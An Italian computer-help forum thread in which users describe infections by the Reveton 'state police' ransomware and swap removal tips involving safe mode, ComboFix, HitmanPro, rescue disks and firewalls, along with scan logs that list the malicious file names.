grazie e Buon Natale :D



ecco il log:

http://www.filedropper.com/combofix_4


e il messaggio che mi è apparso nella finestra:
http://www.filedropper.com/virus_1

grazie

Io ho trovato l'unico modo di accedere dal prompt,e lanciando il ripristino della configurazione da li si riesce a tornare indietro quel tanto da poter entrare in modalità provvisoria e lanciare i vari Combofix,ecc.
Massimo

Buonasera.Oggi ho beccato il virus polizia di stato.Vi spiego la situazione.Ho provato ad entrare in modalità provvisoria ma non ci riuscivo.Dopo vari tenttivi però ce l'ho fatta.Sono andato su Start---Tutti i programmi---Esecuzione automatica---e qui ho trovato il file runctf. L'ho spostato nel cestino ed eliminato.Riavvio il pc.Ho come antivirus MSE e noto che in quarantena ho dei file che fanno riferimento a runctf.Li cancello.Riavvio il pc con la connessione ad internet e mi ricompare di nuovo la schermata del virus.Provo a fare nuovi tentativi e riesco a fare una scansione con malwarebytes che mi trova 2 file infetti che rimuovo ed il programma mi richiede di riavviare subito:

File rilevati: 2
C:\Documents and Settings\Utente\wgsdgsdgdsgsd.dll (Exploit.Drop.GS) -> Verrà eliminato al riavvio.
C:\Documents and Settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.pad (Exploit.Drop.GSA) -> Spostato in quarantena ed eliminato con successo.

Vado a guardare in MSE e vedo che in quarantena mi trovo sempre 4 trojan:

Trojan:Win32/Reveton!lnk

tre di questi fanno riferimento al file:
C:\Documents and Settings\Utente\Menu Avvio\Programmi\Esecuzione automatica\runctf.lnk

il quarto invece:
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0016261.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0017261.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0018266.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0019266.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0019272.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0019277.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0022289.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0023298.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0028317.lnk

La cosa strana è che questi virus in quarantena hanno la data e l'ora corrente.Come se si riformassero in ogni istante quindi ho paura a rimuoverli dalla quarantena pertanto ho la sensazione che il problema non sia ancora risolto.Al momento vi sto scrivendo dal pc in questione.Potete aiutarmi?Ho windows xp sp3 ed in tutto ciò non so se il ripristino di configurazione devo tenerlo attivato o disattivato.
Grazie

Fai un controllo con HitmanPro 3.7 http://www.surfright.nl/it/downloads/

NB: non prevede installazione
NB1: non attivare la licenza

Con questo software che hai consigliato sono riuscito a toglierlo, ti ringrazio.
Non ho installato il programma, però per cancellarlo ho dovuto attivare una key gratuita..ci sono problemi?

Con questo software che hai consigliato sono riuscito a toglierlo, ti ringrazio.
Non ho installato il programma, però per cancellarlo ho dovuto attivare una key gratuita..ci sono problemi?

No :)

Io uso solo AVG come protezione..vale la pena installarlo HitmanPro oppure mi consigli qualche altro programma?

Grazie :)

Buonasera.Oggi ho beccato il virus polizia di stato.Vi spiego la situazione.Ho provato ad entrare in modalità provvisoria ma non ci riuscivo.Dopo vari tenttivi però ce l'ho fatta.Sono andato su Start---Tutti i programmi---Esecuzione automatica---e qui ho trovato il file runctf. L'ho spostato nel cestino ed eliminato.Riavvio il pc.Ho come antivirus MSE e noto che in quarantena ho dei file che fanno riferimento a runctf.Li cancello.Riavvio il pc con la connessione ad internet e mi ricompare di nuovo la schermata del virus.Provo a fare nuovi tentativi e riesco a fare una scansione con malwarebytes che mi trova 2 file infetti che rimuovo ed il programma mi richiede di riavviare subito:

File rilevati: 2
C:\Documents and Settings\Utente\wgsdgsdgdsgsd.dll (Exploit.Drop.GS) -> Verrà eliminato al riavvio.
C:\Documents and Settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.pad (Exploit.Drop.GSA) -> Spostato in quarantena ed eliminato con successo.

Vado a guardare in MSE e vedo che in quarantena mi trovo sempre 4 trojan:

Trojan:Win32/Reveton!lnk

tre di questi fanno riferimento al file:
C:\Documents and Settings\Utente\Menu Avvio\Programmi\Esecuzione automatica\runctf.lnk

il quarto invece:
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0016261.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0017261.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0018266.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0019266.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0019272.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0019277.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0022289.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0023298.lnk
file:C:\System Volume Information\_restore{149FA109-8D2E-48E5-BF1B-3CD858C52BEB}\RP68\A0028317.lnk

La cosa strana è che questi virus in quarantena hanno la data e l'ora corrente.Come se si riformassero in ogni istante quindi ho paura a rimuoverli dalla quarantena pertanto ho la sensazione che il problema non sia ancora risolto.Al momento vi sto scrivendo dal pc in questione.Potete aiutarmi?Ho windows xp sp3 ed in tutto ciò non so se il ripristino di configurazione devo tenerlo attivato o disattivato.
Grazie

Scusate qualcuno può darmi dei suggerimenti?Credo di essere riuscito ad eliminare il virus ma non ne sono sicuro.Come posso muovermi?

Edit: Ho fatto una scansione con Hitman Pro e non ha trovato nessuna minaccia.Solo tracking cookie.

ragazzi io l-ho beccato ieri questo bastardo e devo dire che si e evoluto perche l-avevo gia beccato l-anno scorso

Entrando con il disco di ubunto l-ho scovato e si trova il windows system 32 con il nome wgsdgsdgdsgsd.exe
solo che non riesco a levarlo manualemente perche non sono esperto di ubuntu e non so proprio come fare ad eliminare un file .exe di windows dal disco

questo e uno dei piu bastardi virus che abbia mai trovato, mi ha bloccato modalita provvisorai e sono falliti tentativi di eliminazione avviando chiavetta usb

help help

ragazzi io l-ho beccato ieri questo bastardo e devo dire che si e evoluto perche l-avevo gia beccato l-anno scorso

Entrando con il disco di ubunto l-ho scovato e si trova il windows system 32 con il nome wgsdgsdgdsgsd.exe
solo che non riesco a levarlo manualemente perche non sono esperto di ubuntu e non so proprio come fare ad eliminare un file .exe di windows dal disco

questo e uno dei piu bastardi virus che abbia mai trovato, mi ha bloccato modalita provvisorai e sono falliti tentativi di eliminazione avviando chiavetta usb

help help

HitmanPro 3.7 with Kickstart http://www.surfright.nl/en/downloads

in modalità Kickstart vedi http://www.youtube.com/watch?v=aBS902Qr0oc

Io sul mio notebook ho Windows 7 SP1 sempre aggiornato con gli ultimi aggiornamenti sulla sicurezza rilasciati mensilmente da Microsoft. Come browser ho Internet Explorer 9. Stamattina ho fatto una scansione del sistema con Avira Antivirus Premium 2012 e mi ha trovato in "C:\Utenti\NomeUtente" un file chiamato "wgsdgsdgdsgsd.exe" e mi ha detto che tale file fosse infetto con il cavallo di troia "TR/Reveton.F.44". L'azione consigliata è stata quella di spostare il file in quarantena, cosa che ho fatto (cioè che ha fatto Avira dopo avergli dato l'OK).

Devo fare altro? Adesso sono terrorizzato che questo virus possa aver già fatto danni, come aver modificato il registro di Windows o altro! :(
Però trovo doveroso precisare che io non ho nessun problema di quelli da voi citati. A me il task manager funziona, non ho blocchi di nessun tipo e non mi appare nessuna schermata. Zero problemi! Non ne ho adesso problemi e non ne avevo nemmeno prima che Avira mi trovasse sto file (wgsdgsdgdsgsd.exe) e me lo mettesse in quarantena. Ho fatto la scansione con Avira solo perchè la eseguo una volta al mese per vedere se c'è qualche virus (e ne trovo rarissimamente). Ho postato il mio quesito in questo thread perchè ho fatto una ricerca sù Google e diversi fonti danno il file "wgsdgsdgdsgsd.exe" collegato col "virus della polizia" e simili.

Che mi dite?


Fai un controllo con HitmanPro 3.7 http://www.surfright.nl/it/downloads/

NB: non prevede installazione
NB1: non attivare la licenza


Ho fatto la scansione con HitmanPro 3.7 E' stato velocissimo! Ci ha messo 2 minuti circa! Avira Antivirus ci mette 40-45 minuti!
Andiamo ai risultati....Minacce rilevate: 0
Perciò "Nessuna minaccia rilevata"
Questo basta per poter affermare con certezza matematica che il mio PC è al 100% "pulito" oppure devo fare altro?

Buongiorno,

un virus cosi bastardo non mi era mai capitato di prenderlo. Disabilita tutto (anche la modalità provvisoria) e ha un sacco di varianti cosicchè a qualcuno funziona un certo metodo e ad altri no.

Io penso di essere il caso più disperato, in quanto non mi funziona la modalità provvisoria, non mi va il "kav_rescue_10" di Karspersky e non riesco a fare partire il sistema operativo neanche con "HitmanPro 3.7 with Kickstart ".
Quest'ultimo entra nella prima schermata dove ho le 2 opzioni "Bypass master boot record" ma mi appare poi la schermata di dos in cui il sistema mi dice che windows è stato chiuso in modo errato l'ultima volta e di scegliere quindi la modalità di riaccensione. Inutile dire che tutte le prove (modalità provvisoria, senza rete, con prompt dei comandi o normalmente) generano il blocco del pc.
Schermata nera e tanti saluti.

Non sono ancora riuscito ad andare oltre alla schermata di scelta della modalità di accensione di windows.

Possibile che non ci sia una soluzione universale che bypassa completamente il problema?

Avete dei suggerimenti?
Grazie

PS: leggevo in rete 3ds con la data di dicembre, perchè sembra che il virus si sia evoluto e blocca sempre di più le soluzioni che via via risultano fattibili, in cui si propone di usare UBUNTU da USB per poi entrare in wondows a cancellare manualmente i files infetti.

Visto che per me linux rasenta l'arabo, c'è qualcuno che conosce i passi per questa o altre soluzioni?

Grazie per un qualsiasi aiuto.

Pietro

Ma sto runctf cosa fa oltre ad essere una scocciatura? Ruba informazioni informatiche? Bisognerebbe cambiare tutte le password se si è stati infetti?

chi ha difficoltà a rimuovere il malware in questione con HitmanPro, provi quantomeno a vedere se la modalità "forzata" riesce a sortire qualche effetto.

Qui potete vedere anche il filmato http://hitmanpro.wordpress.com/2010/03/16/hitman-pro-in-force-breach-mode.
Se non erro, cmq, da modalità amministratore è sufficiente tener premuto il tasto CTRL di sinistra mentre si lancia appunto HitmanPro.

@ blackline000
... tranquillo, è dal 1997 che ogni tanto capitano virus potenti... non è la prima volta e non sarà l'ultima questa ;)


L'unica accortezza è evitare i soliti siti, non aprire email non riconosciute ed eventualmente i popup chiuderli con ALT+F4 e non clickando sui pulsanti... insomma le solite 4 raccomandazioni di sempre ;)

Ma sto runctf cosa fa oltre ad essere una scocciatura? Ruba informazioni informatiche? Bisognerebbe cambiare tutte le password se si è stati infetti?

Sarei interessato anche io ad avere una risposta alla tua domanda visto che sono stato colpito nei giorni precedenti da questo virus.Gentilmente qualcuno può darci una dritta?Grazie

Buongiorno,

un virus cosi bastardo non mi era mai capitato di prenderlo. Disabilita tutto (anche la modalità provvisoria) e ha un sacco di varianti cosicchè a qualcuno funziona un certo metodo e ad altri no.

Io penso di essere il caso più disperato, in quanto non mi funziona la modalità provvisoria, non mi va il "kav_rescue_10" di Karspersky e non riesco a fare partire il sistema operativo neanche con "HitmanPro 3.7 with Kickstart ".
Quest'ultimo entra nella prima schermata dove ho le 2 opzioni "Bypass master boot record" ma mi appare poi la schermata di dos in cui il sistema mi dice che windows è stato chiuso in modo errato l'ultima volta e di scegliere quindi la modalità di riaccensione. Inutile dire che tutte le prove (modalità provvisoria, senza rete, con prompt dei comandi o normalmente) generano il blocco del pc.
Schermata nera e tanti saluti.

Non sono ancora riuscito ad andare oltre alla schermata di scelta della modalità di accensione di windows.

Possibile che non ci sia una soluzione universale che bypassa completamente il problema?

Avete dei suggerimenti?
Grazie

PS: leggevo in rete 3ds con la data di dicembre, perchè sembra che il virus si sia evoluto e blocca sempre di più le soluzioni che via via risultano fattibili, in cui si propone di usare UBUNTU da USB per poi entrare in wondows a cancellare manualmente i files infetti.

Visto che per me linux rasenta l'arabo, c'è qualcuno che conosce i passi per questa o altre soluzioni?

Grazie per un qualsiasi aiuto.

Pietro

mi è capitato di eliminare dal pc di mia nipote questo virus nelle condizioni in cui era tutto disabilitato anche la modalità provvisoria..
la gestione è la seguente.
Devi recuperare/creare un cd/usb di avvio con win7PE
E' una versione ridotta di win7 (come era BartPE per xp..) ...
Da questo sistema avviato da CD(o da usb) devi eliminare tutti i programmi che si avviano allo startup del sistema infetto. Per fare questo puoi usare hijackthis indirizzando il sistema infetto (oppure un regedit di sistema remoto). Una volta spuntate queste voci il virus diventa "innocuo". Puoi a quel punto eseguire la pulizia con qualsiasi antivirus da modalità provvisoria. Io l'ho ripulito con combofix da modalità provvisoria.

Si può pure cercare in rete hiren's cd,contiene un sacco di programmi utili e anche un Windows live che aiuta in questi lavori

qualcuno sa se funziona avg rescue cd?

Ciao e Buon Anno Nuovo,

il malware in questione si prende navigando normalmente sia su siti comuni (apple.com, comune via, se vai su quel sito ti meriti tutto il male possibile) ;) , che su siti "strani", io l'ho preso da delle pagine popup che apre il motore torrent "ilcorsaronero", ma un mio conoscente lo prende sempre (è abbonato) cercando in rete immagini erotiche (di dubbia moralità, ma secondo lui di alto valore artistico [questi illustratori, si inventano di tutto, pur di veder due culi]) :D .
Io ho un Win7Pro originale aggiornato alle ultime patch che il Nod32 (avevo di 4.xx, quando l'ho preso) mi segnala sempre, credevo d'essere al sicuro, finchè è apparsa la schermata incriminata, ne ho tolti molti in giro, è il mio lavoro toglierlo, ma per ora di malware tenaci così non ne ho mai visti, non capisco che vulnerabilità (uso mozilla Firefox aggiornato) sfrutti per entrare nel sistema, aggiorno sempre i vari plug-ins quindi flash, shockwave, java, adobe reader, ecc. , cambio sempre i dns in uso adoperando gli opendns (208.67.220.220 - 208.67.222.222 o uso quelli di google 8.8.8.8 - 8.8.4.4). Consiglio a tutti il Firefox come browser, ma a quanto pare non serve a nulla visto che questa infezione si prende cmq, e poi il Firefox ormai è troppo commerciale ed utilizzato, cmq sempre meglio di IE.
Di antivirus ho notato che nessuno riesce a fermarlo, però non ho ancora provato un antivirus col firewall, magari chissà, o magari un semplice antimalware che blocchi la scrittura nel registro.

Per rimuoverlo la solita modalità provvisoria, e se non funziona, col Kaspersky rescue disk:

http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso

permette tra le altre cose (non ricordo se riconosce il malware in questione) di accedere al registro di Windows e rimuovere eventuali malware che si autoavviano.

bye

ps= gradirei conoscere la Vostra esperienza su questo malware. Stamani mi accingo a rimuoverlo un'ennesima volta ;) dal conoscente illustratore che se le ripreso, quando un suo amico gli ha rimosso il Nod32 per far posto a quel elefantiaco AVG2012/3, mi sa che questo mio conoscente farà da cavia per le mie prove. :)

invece avg rescue cd non si sa. se dovesse capitarmi usero' Kaspersky rescue disk.
forse al conoscente sarebbe meglio installargli linuxmint per navigare.

Si prende in tutti i modi anche se di solito, è più facile se uno naviga su siti ehmmm.. comunque si prende sia con avira, nod, avg, avast... non ho provato con virit che controlla pure i registri; comunque a livello di virus ho trovato di molto peggio :-)

Inviato dal mio GT-I9300 con Tapatalk 2

Evidentemente usano code java o framework non bloccabili dal browser, sicuramente non ActiveX visto che capita anche con Firefox o chrome. .
Effettivamente è una palla gigantesca

Inviato dal mio GT-I9300 con Tapatalk 2

Ciao,

andato dal mio conoscente, dopo avergli rimosso il malware con il mio buon abc.exe ;) (il comune combofix.exe che rinomino da mesi, quando lo scarico nella mia fidata pennina usb da 4 GByte con protezione dalla scrittura in hardware [una Imation]) dalla provvisoria, ho disinstallato con "gusto" il pessimo e pesante AVG2013 (l'Internet Security, tra l'altro), dopo il riavvio necessario ed una scansione col nuovo Malwarebyte (che non ha trovato nulla [ricordo che il combofix.exe una volta adoperato, andrebbe rimosso, semplicemente rinominando il file da combofix.exe a uninstall.exe, rilanciando il tool, sembra che rifaccia la scansione, ma invece di partire dal primo "stage", comunica che il programma è stato disinstallato, ed il file si autocancella, dopo l'ok]). Ho letto un pò in giro qui nei forum, per scovare un qualcosa che bloccasse tale malware, ma non ho trovato conferme o non avevo voglia ne tempo di perdere troppo tempo, quindi ho provato ad installare il buon "vecchio" Avira Antivirus 2013 Free con in coppia il "fantomatico" Emsisoft Online Armor Free Firewall, che conoscevo da un pò di tempo, ma visto la complessità di domande che potrebbe porre all'utente finale ho deciso di non installarlo mai a nessuno (troppo difficile per l'utente medio a mio parere), ma questa era l'occasione speciale per metterlo alla prova.
Una volta installato, l'Online Armor fa una ricerca completa del sistema e dei suoi driver e dei programmi che si avviano automaticamente, dopo alcuni minuti (il pc del mio conoscente è un notebook economico con Win7, magari su un pc fisso più recente la fase di "autoapprendimento" è più veloce) il pc è pronto, dopo l'ennesimo riavvio, sono pronto a sperimentarlo. Subito mi fiondo nella cronologia di Firefox nei siti porno più disparati che il mio amico ha visitato ieri sera, et voilà, compare subito la finestrina di Online Armor che mi chiede di intervenire su due processi del genere "wgsdgsdgdsgsd" ecc. [mi sembra che sia partito tutto da un exploit Java], spunto la casella di ricordare la mia decisione e clicco su Blocca. Da lì, in poi, provo e riprovo a visualizzare altre immagini di questi siti, riavvio il pc, e riprovo nel tentativo di riprendere il malware ma niente, l'exploit "sembra" fixato grazie a l'OnlineArmorFree (ossia, è trial per 30 giorni la versione premium, dopodichè diventa freeware, mi pare d'aver capito, limitando alcune opzioni). Chiaramente l'Avira in tutto questo trambusto non ha rilevato un "fico secco", nemmeno l'installazione dell'OnlineArmor, forse limitando l'Avira nelle sue preferenze è possibile migliorare la reattività del sistema, disabilitando il controllo Hips di questo antivirus, opzione inutile se non riesce a bloccare malware del genere. (o magari optare per antivirus ancora più leggeri tipo il PandaCloud)

In conclusione questo OnlineArmor "sembra" che faccia il suo dovere davvero, riuscendo a bloccare il malware in oggetto. Sembrerebbe facile sentenziare che quest'accoppiata OnlineArmor + antivirus free (leggero) sia quella più consona ed appropriata per chiunque, ma chissà, vedremo.

bye

Interessante esperienza, e mi rammarica che sul mio pc l'online armor aveva problemi a girare, ed ho messo zone allarm al suo posto, che come il buon avira non ha bloccato un fico secco.:rolleyes:

Interessante esperienza, e mi rammarica che sul mio pc l'online armor aveva problemi a girare, ed ho messo zone allarm al suo posto, che come il buon avira non ha bloccato un fico secco.:rolleyes:

Ma ZoneAlarm mi sembra più pesante di OnlineArmor.


bye

Buongiorno a tutti :)

Ho ceracato di leggere tutte le discussioni per evitare di ripetere sempre gli stessi argomenti, vi descrivo velocemente la mia situazione.
Ho preso anch'io questo virus e, preso totalmente dal panico, leggendo qua e la sono andato in modalità provvisoria ed ho svuotato manualmente la cartella Temp.

Il virus adesso sembra debellato, nel senso che funziona tutto; l'unico problema è che all'accensione del PC mi si apre la finestra che allego.

Come devo fare per eliminare quest'ultima rogna? Grazie :)

Ciao,

Disabilita l'antivirus e lancia il combofix.exe:

http://www.bleepingcomputer.com/download/combofix/


bye

Cmq il combofix.exe può essere lanciato anche dal prompt di comando "combofix /killall" caricandolo da una pen drive usb, quindi il solito F8 all'avvio e poi si seleziona il prompt senza rete:

http://4.bp.blogspot.com/-W0u8sZhDuvc/T8T8JHTxbhI/AAAAAAAAAUc/3E406yPWVPs/s1600/avvio+windows+modalit%C3%A0+provvisoria.jpg

bye

Ciao, son qui che ti leggo però non essendo un utente esperto di PC (anzi, tutt'altro) sto valutando la tua prima risposta (perché già la seconda è un po' più impegnativa...) però leggo che combofix non guarda in faccia a nessuno.

In altri termini ho letto che è un ultima spiaggia solamente per utenti esperti... :(

Se è il pc di casa, che lo usi solo Tu vai tranquillo, non fa del male, più di quello che già fa il tuo antivirus.

bye

Vabbè, allora vado...

Ci sentiamo fra un po'... ;)

P.S. Eccomi con subito due intoppi:

1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC;

2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino... :confused:

3) ho ovviamente stoppato tutto la procedura :(

Vabbè, allora vado...

Ci sentiamo fra un po'... ;)

P.S. Eccomi con subito due intoppi:

1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC;

2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino... :confused:

3) ho ovviamente stoppato tutto la procedura :(

1) Se nell'Avira l'ombrellino è chiuso, fai cmq la scansione, non c'è problema.

2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no.

3) Vai tranquillo, al massimo prende fuoco il pc. :D


bye

1) Se nell'Avira l'ombrellino è chiuso, fai cmq la scansione, non c'è problema.

2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no.

3) Vai tranquillo, al massimo prende fuoco il pc. :D


bye

Avete visto colonne di fumo in giro? Bene, perché il mio PC non ha preso fuoco :D

Per adesso il problema è risolto: bravi :ave:

Grazie, a presto :)

ps= gradirei conoscere la Vostra esperienza su questo malware.

Beccato ieri sera navigando con Firefox (in versione beta, la 19.0a2 di Aurora) sul mio vecchio portatile Toshiba con WinXp e AVGfree 2013... Terribile esperienza poichè in più di dieci anni di attività con i pc windows era la prima volta che prendevo un virus così potente, in maniera subdola ed inaspettata tale da bloccare qualsiasi intervento, anche in modalità provvisoria. La cosa strana è che non ho frequentato alcun sito piccante :D nè sono andato su siti alla ricerca di software piratato dove notoriamente è possibile prendere virus... la famigerata schermata della pseudo polizia postale mi è apparsa all'improvviso, dopo esser sparito per qualche istante il desktop... :eek:
Già rassegnato all'idea di dover formattare, fortunatamente avevo un'altro pc e con una breve ricerca su internet mi sono affidato alla soluzione offerta dal ComboFix... Alla fine, portatile disinfettato e qualche ora di sonno perse... ;)

Mi autoquoto al post di Orione: la stessa cosa è successa a me ieri sera.
Stavo navigando con Firefox su siti assolutamente tranquilli (cercavo recensioni di un certo modello di gomme invernali), a un certo punto è sparito il dekstop, per una frazione di secondo ho visto MSE che cercava di dire qualcosa, ma poi è apparsa a tutto schermo la videata con l'avviso della polizia di stato (e relativa richiesta di 100 € per la sistemazione).
La stessa cosa succedeva anche in modalità provvisoria, per cui non ho potuto adottare alcuni interventi consigliati su Internet.

Allora sono partito con un liveCD e ho cancellato manualmente dalla cartella documenti un eseguibile sicuramente maligno, e da esecuzione automatica il link a questo eseguible.
A quel punto il pc si è finalmente avviato, e ho fatto una passatona con MalwareBytes che ha trovato altri 3 elementi nocivi e li ha messi in quarantena.
Ora mi chiedo: devo fare altro (es. Combofix) ?

Cosa fa esattamente questo virus ?
Ho sentito dire che può anche crittografare i files, rendendoli inutilizzabili.

Ho letto in rete che anche gente con Avast e Avira ultimamente si è beccato questo virus.
Vorrei levare al più presto MSE che ieri sera mi ha profondamente deluso, ma con cosa lo sostituisco ?

chi ha difficoltà a rimuovere il malware in questione con HitmanPro, provi quantomeno a vedere se la modalità "forzata" riesce a sortire qualche effetto.

Qui potete vedere anche il filmato http://hitmanpro.wordpress.com/2010/03/16/hitman-pro-in-force-breach-mode.
Se non erro, cmq, da modalità amministratore è sufficiente tener premuto il tasto CTRL di sinistra mentre si lancia appunto HitmanPro.
sempre in relazione ad HitmanPro, segnalo che è stata introdotta un'ulteriore tecnologia (Kickstart) pensata tra l'altro per avere ragione anche dei virus oggetto di questo thread (ramsomware, "riscatto").

Questa tecnologia prevede la creazione di un'apposita unità USB con cui effettuare il boot automatizzando di conseguenza tutto il processo di rimozione.

Video che mostra come creare l'unità USB (https://www.youtube.com/watch?feature=player_embedded&v=aBS902Qr0oc)

Video che mostra come utilizzarlo (https://www.youtube.com/watch?feature=player_embedded&v=lUNHidkYsDQ)

Se vi può servire, l'uso è davvero banale...

NB: compatibile da XP a 7

Ieri sera ho cantato vittoria troppo presto.
Malwarebytes ha si eliminato un po' di roba, in particolare quella finestra del "ricatto" che impediva qualsiasi attività, ma poi usando un po' il pc questo era enormemente rallentato, Hijackthis si bloccava a 3/4 della scansione e rimaneva impallato, cliccando con il dx sul desktop usciva il menù contestuale dopo quasi 2 minuti d'orologio, Windows segnalava la mancanza di antivirus e firewall anche se presenti, ecc. ecc.
Allora ho provato Combofix e questo dopo circa mezz'ora di lavoro mi ha eliminato un po' di roba.
Vedo nel log che però ha trovato fra i files creati recentemente, anche questo:

2013-01-09 22:16 . 2013-01-10 05:51 3032 ----a-w- c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js

Non mi piace tanto quel nome, non vorrà dire che qualcosa è rimasto ancora ?
Adesso dopo la passata con Combofix il pc è molto più reattivo, ma sarà davvero finita ?
Se postassi il log di Combofix, qualcuno me lo potrebbe controllare ?
Grazie.

Postalo.

bye

salve ragazzi,

un mio amico ha preso questo virus e ora tocca a me sistemare le rogne, sono riuscito in un modo o nell'altro a debellarlo, anche se non del tutto, ho cambiato cartella al file wdsgdgsdsgdsg.exe e ora ovviamente all'autoavvio non lo trova più e quindi non parte.

poi ho fatto una scansione con avira e me lo rileva giustamente come minaccia e lo ho fatto mettere in quarantena assieme a altri 3-4 file che ha trovato.

il problema dove sta ora?

semplice il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere?

Pindol

Qualche servizio ancora attivo.. quindi ti consiglio di usare combofix, malwarebyte, virit e un bel ccleaner per pulire i temporanei; fatto questo il pc dovrebbe ritornare a riprendersi :-)

Inviato dal mio GT-I9300 con Tapatalk 2

Postalo.

Eccolo: logCombofix.txt (http://wikisend.com/download/523360/logCombofix.txt)
Grazie :)


salve ragazzi,
il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere?

Prova anche tu Combofix, per me è stato risolutivo.
Non avere fretta, fallo lavorare finche si riavvia il sistema e prosegue con le sue attività.

Ciao,

questo va cancellato (magari anche con "autoruns" se li rileva o il GMER):

c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js

Consiglio l'installazione di un firewall software come l'OnlineArmor che dovrebbe ribloccare il malware in questione.

bye

Salve a tutti,
avevo aperto l'altro ieri il thread seguente riguardante una variante di questo virus:

http://www.hwupgrade.it/forum/showthread.php?t=2538472

E' stato chiuso suggerendomi di venire qui; tuttavia avevo già letto per intero questo thread e, se ne avevo aperto un altro, è a causa di una anomalia che non riscontro in un nessun altro caso citato.

Come potete leggere, non ho avuto problemi a debellare il virus; tuttavia la maggior parte dei miei file (compresi quelli contenuti in una memoria esterna) sono diventati illeggibili. E non intendo criptati, ma proprio illeggibili: infatti non hanno cambiato estensione, nome o dimensione. Inoltre tutti i decrypter citati non hanno sortito effetto..

Nessun recupero è stato possibile nemmeno con svariati software di recupero.

Volevo sapere se avevate esperienza di altri casi simili o suggerimenti per "riparare" file.
Grazie

mi sono beccat o2 volte in un meso questa bestiaccia . . . e non ho nemmeno capito come. . . .

Comunque dato che mi funge solo la provvisoria con prompt ho usato combofix e in 5 min ho risolto tutto.

Al seconndo giro, brutta sorpresa, mi appare un messaggio tipo:

La data é 30-01-2013, la versione di comboxif é scaduta, cancellare e scaricare una nuova versione.

E logicamente sul sito il download non é temporaneamente disponibile.

Chiedo disperatamente aiuto per debellare il virus e consigli per prevenire nuove infezioni

attualmentemi difendo con Avira e Malawarebyte.

E' vero, Combofix non risulta scaricabile al momento.
Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ?

Ho letto cmq che anche HitmanPro (http://www.surfright.nl/it/hitmanpro) dovrebbe risolvere, lo hai provato ?

Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ?


Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci... ;)

P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...:)

sono riuscito a riavviare!

sto scansionando, ma dato che non prendevo virus da anni e questo in 15 gg mi ha fregato 2 volte, non sto tanto tranquillo.


ho win7 e uso internet explorer

Come difese ho avira e malawarebyte

Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

cosa dovrei fare per pararmi il . . . .

Grazie!

Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci... ;)

Beh non è proprio così scontato che per bypassare il periodo di validità di un software, sia sufficiente portare indietro la data del computer.
Se fosse così le trial anche di software costosi avrebbero vita infinita ... :stordita:


P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...:)
Anch'io avevo quel file dsgsdgdsgdsgw.js sul pc, è buono che AVG te l'abbia riconosciuto come pericoloso e te l'ha spostato in quarantena.
Nel mio caso (allora avevo MSE), l'antivirus di Microsoft non se n'era neanche accorto.
Me l'ha trovato Combofix e l'ho tolto dalla cartella documenti.
Comunque l'ho salvato e l'ho aperto con blocco note, tanto è un javascript.
E' interessante quello che c'è dentro.
